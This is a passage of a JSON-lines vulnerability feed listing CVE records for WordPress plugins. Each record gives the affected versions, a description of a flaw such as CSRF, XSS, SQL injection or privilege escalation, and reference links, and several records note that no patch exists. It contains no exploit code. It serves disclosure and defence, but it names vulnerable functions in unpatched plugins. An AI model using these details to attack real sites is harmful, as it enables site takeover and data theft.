{"CVE_ID":"CVE-2023-6946","slug":"autotitle-for-wordpress","versionImpact":"1.0.3","description":"The Autotitle for WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54a00416-c7e3-44f3-8dd2-ed9e748055e6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54a00416-c7e3-44f3-8dd2-ed9e748055e6\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6946\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6946\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1338","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the stopOptimizeAll function. This makes it possible for unauthenticated attackers to modify image optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e3dd131-dbd8-431c-96f4-4ab2c3be4dbd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e3dd131-dbd8-431c-96f4-4ab2c3be4dbd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0377","slug":"lifterlms","versionImpact":"7.5.1","description":"The LifterLMS \u2013 WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_review' function in all versions up to, and including, 7.5.1. This makes it possible for unauthenticated attackers to publish an unrestricted number of reviews on the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1f41400-5c59-444d-9c1e-121e83449521?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1f41400-5c59-444d-9c1e-121e83449521?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036762\\\/lifterlms\\\/tags\\\/7.5.2\\\/includes\\\/class.llms.review.php?old=2903997&old_path=lifterlms\\\/trunk\\\/includes\\\/class.llms.review.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036762\\\/lifterlms\\\/tags\\\/7.5.2\\\/includes\\\/class.llms.review.php?old=2903997&old_path=lifterlms\\\/trunk\\\/includes\\\/class.llms.review.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5425","slug":"wp-jquery-lightbox","versionImpact":"1.5.4","description":"The WP jQuery Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 attribute in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3439710-1159-4677-93c9-14bacfbf0b55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3439710-1159-4677-93c9-14bacfbf0b55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-jquery-lightbox\\\/trunk\\\/jquery.lightbox.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-jquery-lightbox\\\/trunk\\\/jquery.lightbox.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lokesh\\\/lightbox2\\\/blob\\\/dev\\\/src\\\/js\\\/lightbox.js#L57\",\"name\":\"https:\\\/\\\/github.com\\\/lokesh\\\/lightbox2\\\/blob\\\/dev\\\/src\\\/js\\\/lightbox.js#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097604\\\/#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097604\\\/#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-jquery-lightbox\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-jquery-lightbox\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10850","slug":"razorpay-payment-button-elementor","versionImpact":"1.2.5","description":"The Razorpay Payment Button Elementor Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9331aa66-2eee-4745-b286-fa6db3bd9f37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9331aa66-2eee-4745-b286-fa6db3bd9f37?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button-elementor\\\/tags\\\/1.2.5\\\/includes\\\/rzp-payment-buttons.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button-elementor\\\/tags\\\/1.2.5\\\/includes\\\/rzp-payment-buttons.php#L78\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11870","slug":"event-registration-calendar-by-vcita","versionImpact":"1.4.0","description":"The Event Registration Calendar By vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's  shortcodes in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-registration-calendar-by-vcita\\\/trunk\\\/core\\\/shortcodes.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8cadb97-2f3e-4b00-ad00-118cf23d1592?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8cadb97-2f3e-4b00-ad00-118cf23d1592?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11951","slug":"homey-login-register","versionImpact":"2.4.0","description":"The Homey Login Register plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.4.0. This is due to the plugin allowing users who are registering new accounts to set their own role. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/homey-booking-wordpress-theme\\\/23338013\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/homey-booking-wordpress-theme\\\/23338013\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67c4066f-b8bc-4cd0-ae47-844af23e003f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67c4066f-b8bc-4cd0-ae47-844af23e003f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31914","slug":"pixel-formbuilder","versionImpact":"1.0.2","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav Pixel WordPress Form BuilderPlugin & Autoresponder allows Blind SQL Injection. This issue affects Pixel WordPress Form BuilderPlugin & Autoresponder: from n\/a through 1.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pixel-formbuilder\\\/vulnerability\\\/wordpress-pixel-wordpress-form-builderplugin-autoresponder-1-0-2-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pixel-formbuilder\\\/vulnerability\\\/wordpress-pixel-wordpress-form-builderplugin-autoresponder-1-0-2-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0722","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_state function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/261a1bf0-a147-48c8-878e-f9b725ac74d8\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/261a1bf0-a147-48c8-878e-f9b725ac74d8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3709","slug":"royal-elementor-addons","versionImpact":"1.3.70","description":"The Royal Elementor Addons plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 1.3.70 due to the plugin adding the API key to the source code of any page running the MailChimp block. This makes it possible for unauthenticated attackers to obtain a site's MailChimp API key. We recommend resetting any MailChimp API keys if running a vulnerable version of this plugin with the MailChimp block enabled as the API key may have been compromised.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86c9bcf1-c69e-47ca-b74b-8ce6157f520b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86c9bcf1-c69e-47ca-b74b-8ce6157f520b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2938619%40royal-elementor-addons&new=2936984%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2938619%40royal-elementor-addons&new=2936984%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5819","slug":"amazonify","versionImpact":"0.8.1","description":"The Amazonify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 0.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. However, please note that this can also be combined with CVE-2023-5818 for CSRF to XSS.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41adfb58-d79f-40a3-8a7e-f3f08f64659f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41adfb58-d79f-40a3-8a7e-f3f08f64659f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amazonify\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amazonify\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonify\\\/trunk\\\/amazonify.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonify\\\/trunk\\\/amazonify.php#L142\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6633","slug":"site-notes","versionImpact":"2.0.0","description":"The Site Notes WordPress plugin through 2.0.0 does not have CSRF checks in some of its functionalities, which could allow attackers to make logged in users perform unwanted actions, such as deleting administration notes, via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb983d82-b894-41c5-b51f-94d4bba3ba39\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb983d82-b894-41c5-b51f-94d4bba3ba39\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0369","slug":"bulk-edit-post-titles","versionImpact":"5.0.0","description":"The Bulk Edit Post Titles plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulkUpdatePostTitles function in all versions up to, and including, 5.0.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-edit-post-titles\\\/trunk\\\/classes\\\/class.bulk.titles.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-edit-post-titles\\\/trunk\\\/classes\\\/class.bulk.titles.php#L130\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6562","slug":"affiliate-toolkit-starter","versionImpact":"3.5.5","description":"The affiliate-toolkit \u2013 WordPress Affiliate Plugin plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.5.5. This is due display_errors being set to true . This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f810cc65-5a19-4ad7-a6b6-41a9b4f30f4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f810cc65-5a19-4ad7-a6b6-41a9b4f30f4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-toolkit-starter\\\/trunk\\\/lib\\\/apai-io\\\/exeu\\\/apai-io\\\/samples\\\/Search\\\/SimpleSearch.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-toolkit-starter\\\/trunk\\\/lib\\\/apai-io\\\/exeu\\\/apai-io\\\/samples\\\/Search\\\/SimpleSearch.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8440","slug":"essential-addons-for-elementor-lite","versionImpact":"6.0.3","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5960396-5320-4978-aa82-2e33700daa43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5960396-5320-4978-aa82-2e33700daa43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Fancy_Text.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Fancy_Text.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148624\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148624\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10778","slug":"stax-buddy-builder","versionImpact":"1.7.4","description":"The BuddyPress Builder for Elementor \u2013 BuddyBuilder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.7.4 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts crated by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/067dde3a-f2d6-44c6-b64e-c8a850dd4d37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/067dde3a-f2d6-44c6-b64e-c8a850dd4d37?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stax-buddy-builder\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stax-buddy-builder\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11930","slug":"taskbuilder","versionImpact":"3.0.6","description":"The Taskbuilder \u2013 WordPress Project & Task Management plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wppm_tasks shortcode in all versions up to, and including, 3.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taskbuilder\\\/trunk\\\/includes\\\/frontend\\\/wppm_tasks_shortcode.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taskbuilder\\\/trunk\\\/includes\\\/frontend\\\/wppm_tasks_shortcode.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210469\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210469\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taskbuilder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taskbuilder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc39d59-7c9d-4d5d-9fb5-b67d2324adaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc39d59-7c9d-4d5d-9fb5-b67d2324adaa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13394","slug":"viewmedica","versionImpact":"1.4.15","description":"The ViewMedica 9 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'viewmedica' shortcode in all versions up to, and including, 1.4.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/viewmedica\\\/trunk\\\/swarm.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/viewmedica\\\/trunk\\\/swarm.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b32c1b63-564c-4c38-a149-d5adabda8a8b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b32c1b63-564c-4c38-a149-d5adabda8a8b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11153","slug":"content-control","versionImpact":"2.5.0","description":"The Content Control \u2013 The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.0 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/content-control\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/content-control\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbe51f96-82b2-4091-acd8-a8131a47eb07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbe51f96-82b2-4091-acd8-a8131a47eb07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6462","slug":"elisqlreports","versionImpact":"5.25.11","description":"The EZ SQL Reports Shortcode Widget and DB Backup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's SQLREPORT shortcode in all versions up to, and including, 5.25.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318513\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318513\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elisqlreports\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elisqlreports\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6811f19-07fb-4c05-977f-90f9c5d89bb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6811f19-07fb-4c05-977f-90f9c5d89bb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0720","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_folder_order function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d392d0b-f286-44da-aa32-a08d0279baed\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d392d0b-f286-44da-aa32-a08d0279baed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5818","slug":"amazonify","versionImpact":"0.8.1","description":"The Amazonify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1. This is due to missing or incorrect nonce validation on the amazonifyOptionsPage() function. This makes it possible for unauthenticated attackers to update the plugins settings, including the Amazon Tracking ID, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 